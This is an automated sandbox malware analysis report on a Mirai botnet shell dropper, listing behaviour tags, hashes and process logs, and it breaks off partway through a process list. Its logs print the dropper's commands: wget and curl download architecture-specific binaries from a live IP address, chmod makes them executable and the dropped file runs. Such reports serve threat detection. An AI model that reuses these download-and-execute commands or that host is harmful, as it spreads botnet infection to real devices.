Malware Analysis Report

2024-11-13 17:44

Sample ID 241109-kfas4szqcx
Target ohshit.sh
SHA256 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed
Tags
mirai lzrd antivm botnet defense_evasion discovery upx
Score 10/10

Analysis Overview

Score 10/10

SHA256

951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed

Threat Level: Known bad

The file ohshit.sh was found to be: Known bad.

Malicious Activity Summary

mirai lzrd antivm botnet defense_evasion discovery upx

Mirai family

Mirai

File and Directory Permissions Modification

Executes dropped EXE

Modifies Watchdog functionality

Enumerates running processes

Writes file to system bin folder

UPX packed file

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 08:32

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 08:32

Reported

2024-11-09 08:34

Platform

debian9-armhf-20240611-en

Max time kernel

139s

Max time network

153s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A (15 identical rows)

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/Chaotic /tmp/Chaotic N/A (15 identical rows)

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/Chaotic N/A (2 identical rows)
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A (2 identical rows)

Enumerates running processes

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /bin/watchdog /tmp/Chaotic N/A (2 identical rows)
File opened for modification /sbin/watchdog /tmp/Chaotic N/A (2 identical rows)

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A (4 identical rows)

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A (15 identical rows)

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/4/status /tmp/Chaotic N/A
File opened for reading /proc/20/status /tmp/Chaotic N/A
File opened for reading /proc/462/status /tmp/Chaotic N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/1/status /tmp/Chaotic N/A
File opened for reading /proc/149/status /tmp/Chaotic N/A
File opened for reading /proc/27/status /tmp/Chaotic N/A
File opened for reading /proc/74/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/647/status /tmp/Chaotic N/A
File opened for reading /proc/648/status /tmp/Chaotic N/A
File opened for reading /proc/3/status /tmp/Chaotic N/A
File opened for reading /proc/401/status /tmp/Chaotic N/A
File opened for reading /proc/267/status /tmp/Chaotic N/A
File opened for reading /proc/605/status /tmp/Chaotic N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/302/status /tmp/Chaotic N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/18/status /tmp/Chaotic N/A
File opened for reading /proc/414/status /tmp/Chaotic N/A
File opened for reading /proc/74/status /tmp/Chaotic N/A
File opened for reading /proc/147/status /tmp/Chaotic N/A
File opened for reading /proc/831/status /tmp/Chaotic N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/28/status /tmp/Chaotic N/A
File opened for reading /proc/265/status /tmp/Chaotic N/A
File opened for reading /proc/308/status /tmp/Chaotic N/A
File opened for reading /proc/95/status /tmp/Chaotic N/A
File opened for reading /proc/2/status /tmp/Chaotic N/A
File opened for reading /proc/6/status /tmp/Chaotic N/A
File opened for reading /proc/305/status /tmp/Chaotic N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/5/status /tmp/Chaotic N/A
File opened for reading /proc/21/status /tmp/Chaotic N/A
File opened for reading /proc/self/exe /tmp/Chaotic N/A
File opened for reading /proc/19/status /tmp/Chaotic N/A
File opened for reading /proc/43/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/776/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/318/status /tmp/Chaotic N/A
File opened for reading /proc/166/status /tmp/Chaotic N/A
File opened for reading /proc/305/status /tmp/Chaotic N/A
File opened for reading /proc/28/status /tmp/Chaotic N/A
File opened for reading /proc/17/status /tmp/Chaotic N/A
File opened for reading /proc/749/status /tmp/Chaotic N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/13/status /tmp/Chaotic N/A
File opened for reading /proc/414/status /tmp/Chaotic N/A
File opened for reading /proc/641/status /tmp/Chaotic N/A
File opened for reading /proc/10/status /tmp/Chaotic N/A
File opened for reading /proc/12/status /tmp/Chaotic N/A
File opened for reading /proc/21/status /tmp/Chaotic N/A
File opened for reading /proc/605/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/685/status /tmp/Chaotic N/A
File opened for reading /proc/22/status /tmp/Chaotic N/A
File opened for reading /proc/107/status /tmp/Chaotic N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/cat N/A (2 identical rows)
N/A N/A /usr/bin/wget N/A (2 identical rows)
N/A N/A /usr/bin/curl N/A (2 identical rows)

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/camp.x86 /usr/bin/wget N/A
File opened for modification /tmp/camp.mips /usr/bin/wget N/A
File opened for modification /tmp/camp.mpsl /usr/bin/wget N/A
File opened for modification /tmp/camp.ppc /usr/bin/wget N/A
File opened for modification /tmp/camp.m68k /usr/bin/curl N/A
File opened for modification /tmp/camp.mips64 /usr/bin/curl N/A
File opened for modification /tmp/camp.ppc /usr/bin/curl N/A
File opened for modification /tmp/camp.arm5 /usr/bin/curl N/A
File opened for modification /tmp/camp.arm6 /usr/bin/wget N/A
File opened for modification /tmp/camp.mpsl /usr/bin/curl N/A
File opened for modification /tmp/busybox /bin/cp N/A
File opened for modification /tmp/camp.arc /usr/bin/curl N/A
File opened for modification /tmp/camp.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm7 /usr/bin/wget N/A
File opened for modification /tmp/camp.sh4 /usr/bin/wget N/A
File opened for modification /tmp/camp.i686 /usr/bin/curl N/A
File opened for modification /tmp/camp.mips /usr/bin/curl N/A
File opened for modification /tmp/camp.arm /usr/bin/curl N/A
File opened for modification /tmp/camp.arm6 /usr/bin/curl N/A
File opened for modification /tmp/camp.i686 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm5 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm7 /usr/bin/curl N/A
File opened for modification /tmp/camp.sparc /usr/bin/curl N/A
File opened for modification /tmp/camp.m68k /usr/bin/wget N/A
File opened for modification /tmp/camp.arc /usr/bin/wget N/A
File opened for modification /tmp/Chaotic /tmp/ohshit.sh N/A
File opened for modification /tmp/camp.x86 /usr/bin/curl N/A
File opened for modification /tmp/camp.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/camp.arm /usr/bin/wget N/A
File opened for modification /tmp/camp.sh4 /usr/bin/curl N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/bin/cp

[cp /bin/busybox /tmp/]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arc]

/bin/cat

[cat camp.arc]

/bin/chmod

[chmod +x busybox camp.arc Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.x86]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.x86]

/bin/cat

[cat camp.x86]

/bin/chmod

[chmod +x busybox camp.arc camp.x86 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.x86_64]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.x86_64]

/bin/cat

[cat camp.x86_64]

/bin/chmod

[chmod +x busybox camp.arc camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.i686]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.i686]

/bin/cat

[cat camp.i686]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mips]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mips]

/bin/cat

[cat camp.mips]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mips64]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mips64]

/bin/cat

[cat camp.mips64]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mpsl]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mpsl]

/bin/cat

[cat camp.mpsl]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm]

/bin/cat

[cat camp.arm]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm5]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm5]

/bin/cat

[cat camp.arm5]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm6]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm6]

/bin/cat

[cat camp.arm6]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm7]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm7]

/bin/cat

[cat camp.arm7]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.ppc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.ppc]

/bin/cat

[cat camp.ppc]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.sparc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.sparc]

/bin/cat

[cat camp.sparc]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.m68k]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.m68k]

/bin/cat

[cat camp.m68k]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.sh4]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.sh4]

/bin/cat

[cat camp.sh4]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sh4 camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

Network

Country Destination Domain Proto
US 198.12.107.126:80 198.12.107.126 tcp (30 identical rows)
US 198.12.107.126:3778 tcp (4 identical rows)

Files

/tmp/busybox

MD5 e588bcf03ae78237b58899d35f50c570
SHA1 2194732ebbefbc27bdae876c77f2a97a20175710
SHA256 2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88
SHA512 904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555

/tmp/camp.arc

MD5 36a7a1e959eaf7d6896505777912ecdf
SHA1 4f9a1f8cc82036f0ffb90c6dc1c5093bca499919
SHA256 5111947e9ff3b6280e4ba90b172bf864838492b0b48d640be41f51be427c44ca
SHA512 77acb1b88c40e0f91b4ec44216b3b49161a892f6bbca2cb09fe82be1ba7f5b469008f655b46473ba53734d2610863b98f97ac3a54475837867efc3e156bf2fb0

/tmp/Chaotic

MD5 dac9f1dcafdb77db0d0ff1be1e704b1e
SHA1 e83605a050e0aaad3dba360545a00036f083eb91
SHA256 7fd32ee1c25ade0f67fc93e797707d956ee74c36c44c93ea8e3f00a0085e938d
SHA512 e2869500ed728e8a63947e541dc5c04edb9d581862715863334195d87f35c5207de8db7e23affe8113b2029ddbffd92364491e4291c53ecc4664fcc0244a0571

/tmp/Chaotic

MD5 62e0ec59f989335be5fbf630a49da4ea
SHA1 43bdde1afd1089008539973b08e35dd66fb7451a
SHA256 c3ae1058890bf151d5d464a608b68e2c377d4d31043e3883efb0d8a20685ab15
SHA512 ee8c5e36a0abc86c042630fcbd03f96459fe77cd8683498b77121c1a11befe59f72e3363989265317109f77df2d3c8633ccabc7e91581e3bdc363f29b8173b95

/tmp/Chaotic

MD5 4c64afb0ad73da68d0e9dc8894d97f3a
SHA1 0d3f5938508079bf9dbbe13d75d7b91e21845312
SHA256 de175c508f1a56aa4fd47e0aa8103566c46508823bd8800a71e1f354fa18db2b
SHA512 7e65132191ca5f83ac7ce6b7d63a3423175d3ab893a859c1de37fd9d22f4fd4c76cfc163405ddc6c6c2910c31831a3c0a4f3b86fa68a241c40f328823050e107

/tmp/Chaotic

MD5 adfc93deaed5f946d896d185a7a3672f
SHA1 30686df1ec33ec8941a6bd5471292ec4dfdc7522
SHA256 9ff7a99509c5186f028858692deb9b685bb196df414fad5822dec0f4efe90ccd
SHA512 94318e934aa23e1b9dfe4baa2dd1700986bea4343cf62bcac4c964876b42f70235260bc3ed4d367bf0501bfa334a5472a7307d258762cbf6d9c93b116263867f

/tmp/Chaotic

MD5 69e35fed3302be73c0de271eae2690f7
SHA1 fdfb172bdcefc5f97d642c56e3771deffa0341c6
SHA256 265c9eb70b9af05fc3e2cbeaf5a3505a76e5903b3e9286e70ba799c430f15981
SHA512 1157694bf541b030139adfc760dacee62d39d45970d958a60177b1068320a9f3501971a7b745788f99024b757e81b4304b3ff7c1c4eeb76cd194c4f681db07f2

memory/773-1-0x00008000-0x00025990-memory.dmp

memory/816-2-0x00008000-0x0001a904-memory.dmp

memory/821-3-0x00008000-0x0002fc28-memory.dmp

memory/828-4-0x00008000-0x000236c8-memory.dmp

memory/840-5-0xb6763000-0xb6774044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-09 08:32

Reported

2024-11-09 08:34

Platform

debian9-mipsbe-20240729-en

Max time kernel

145s

Max time network

146s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A (15 identical rows)

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/Chaotic /tmp/Chaotic N/A (15 identical rows)

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A

Enumerates running processes

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A (4 identical rows)

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/4/status /tmp/Chaotic N/A
File opened for reading /proc/9/status /tmp/Chaotic N/A
File opened for reading /proc/16/status /tmp/Chaotic N/A
File opened for reading /proc/327/status /tmp/Chaotic N/A
File opened for reading /proc/379/status /tmp/Chaotic N/A
File opened for reading /proc/678/status /tmp/Chaotic N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/2/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/78/status /tmp/Chaotic N/A
File opened for reading /proc/161/status /tmp/Chaotic N/A
File opened for reading /proc/356/status /tmp/Chaotic N/A
File opened for reading /proc/386/status /tmp/Chaotic N/A
File opened for reading /proc/8/status /tmp/Chaotic N/A
File opened for reading /proc/74/status /tmp/Chaotic N/A
File opened for reading /proc/84/status /tmp/Chaotic N/A
File opened for reading /proc/176/status /tmp/Chaotic N/A
File opened for reading /proc/715/status /tmp/Chaotic N/A
File opened for reading /proc/722/status /tmp/Chaotic N/A
File opened for reading /proc/811/status /tmp/Chaotic N/A
File opened for reading /proc/23/status /tmp/Chaotic N/A
File opened for reading /proc/71/status /tmp/Chaotic N/A
File opened for reading /proc/5/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/3/status /tmp/Chaotic N/A
File opened for reading /proc/70/status /tmp/Chaotic N/A
File opened for reading /proc/72/status /tmp/Chaotic N/A
File opened for reading /proc/77/status /tmp/Chaotic N/A
File opened for reading /proc/717/status /tmp/Chaotic N/A
File opened for reading /proc/12/status /tmp/Chaotic N/A
File opened for reading /proc/37/status /tmp/Chaotic N/A
File opened for reading /proc/36/status /tmp/Chaotic N/A
File opened for reading /proc/673/status /tmp/Chaotic N/A
File opened for reading /proc/707/status /tmp/Chaotic N/A
File opened for reading /proc/714/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/7/status /tmp/Chaotic N/A
File opened for reading /proc/10/status /tmp/Chaotic N/A
File opened for reading /proc/353/status /tmp/Chaotic N/A
File opened for reading /proc/712/status /tmp/Chaotic N/A
File opened for reading /proc/819/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/19/status /tmp/Chaotic N/A
File opened for reading /proc/22/status /tmp/Chaotic N/A
File opened for reading /proc/122/status /tmp/Chaotic N/A
File opened for reading /proc/155/status /tmp/Chaotic N/A
File opened for reading /proc/240/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/73/status /tmp/Chaotic N/A
File opened for reading /proc/83/status /tmp/Chaotic N/A
File opened for reading /proc/6/status /tmp/Chaotic N/A
File opened for reading /proc/14/status /tmp/Chaotic N/A
File opened for reading /proc/354/status /tmp/Chaotic N/A
File opened for reading /proc/798/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/75/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/17/status /tmp/Chaotic N/A
File opened for reading /proc/20/status /tmp/Chaotic N/A
File opened for reading /proc/675/status /tmp/Chaotic N/A
File opened for reading /proc/81/status /tmp/Chaotic N/A
File opened for reading /proc/121/status /tmp/Chaotic N/A
File opened for reading /proc/24/status /tmp/Chaotic N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A (2 identical rows)
N/A N/A /bin/cat N/A (2 identical rows)
N/A N/A /usr/bin/wget N/A (2 identical rows)

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/camp.ppc /usr/bin/wget N/A
File opened for modification /tmp/camp.m68k /usr/bin/curl N/A
File opened for modification /tmp/camp.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/camp.arm5 /usr/bin/wget N/A
File opened for modification /tmp/camp.sh4 /usr/bin/curl N/A
File opened for modification /tmp/camp.arm /usr/bin/curl N/A
File opened for modification /tmp/camp.arm5 /usr/bin/curl N/A
File opened for modification /tmp/camp.arm7 /usr/bin/curl N/A
File opened for modification /tmp/camp.ppc /usr/bin/curl N/A
File opened for modification /tmp/camp.sh4 /usr/bin/wget N/A
File opened for modification /tmp/camp.mips64 /usr/bin/curl N/A
File opened for modification /tmp/camp.mpsl /usr/bin/wget N/A
File opened for modification /tmp/camp.sparc /usr/bin/curl N/A
File opened for modification /tmp/camp.m68k /usr/bin/wget N/A
File opened for modification /tmp/camp.arc /usr/bin/curl N/A
File opened for modification /tmp/camp.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/camp.i686 /usr/bin/curl N/A
File opened for modification /tmp/camp.mips /usr/bin/wget N/A
File opened for modification /tmp/camp.arm7 /usr/bin/wget N/A
File opened for modification /tmp/camp.mips /usr/bin/curl N/A
File opened for modification /tmp/camp.mpsl /usr/bin/curl N/A
File opened for modification /tmp/camp.arm /usr/bin/wget N/A
File opened for modification /tmp/camp.arm6 /usr/bin/wget N/A
File opened for modification /tmp/Chaotic /tmp/ohshit.sh N/A
File opened for modification /tmp/camp.x86 /usr/bin/wget N/A
File opened for modification /tmp/camp.i686 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm6 /usr/bin/curl N/A
File opened for modification /tmp/busybox /bin/cp N/A
File opened for modification /tmp/camp.arc /usr/bin/wget N/A
File opened for modification /tmp/camp.x86 /usr/bin/curl N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/bin/cp

[cp /bin/busybox /tmp/]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arc]

/bin/cat

[cat camp.arc]

/bin/chmod

[chmod +x busybox camp.arc Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.x86]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.x86]

/bin/cat

[cat camp.x86]

/bin/chmod

[chmod +x busybox camp.arc camp.x86 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.x86_64]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.x86_64]

/bin/cat

[cat camp.x86_64]

/bin/chmod

[chmod +x busybox camp.arc camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.i686]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.i686]

/bin/cat

[cat camp.i686]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mips]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mips]

/bin/cat

[cat camp.mips]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mips64]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mips64]

/bin/cat

[cat camp.mips64]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mpsl]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mpsl]

/bin/cat

[cat camp.mpsl]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm]

/bin/cat

[cat camp.arm]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm5]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm5]

/bin/cat

[cat camp.arm5]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm6]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm6]

/bin/cat

[cat camp.arm6]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm7]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm7]

/bin/cat

[cat camp.arm7]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.ppc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.ppc]

/bin/cat

[cat camp.ppc]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.sparc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.sparc]

/bin/cat

[cat camp.sparc]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.m68k]

/usr/bin/curl

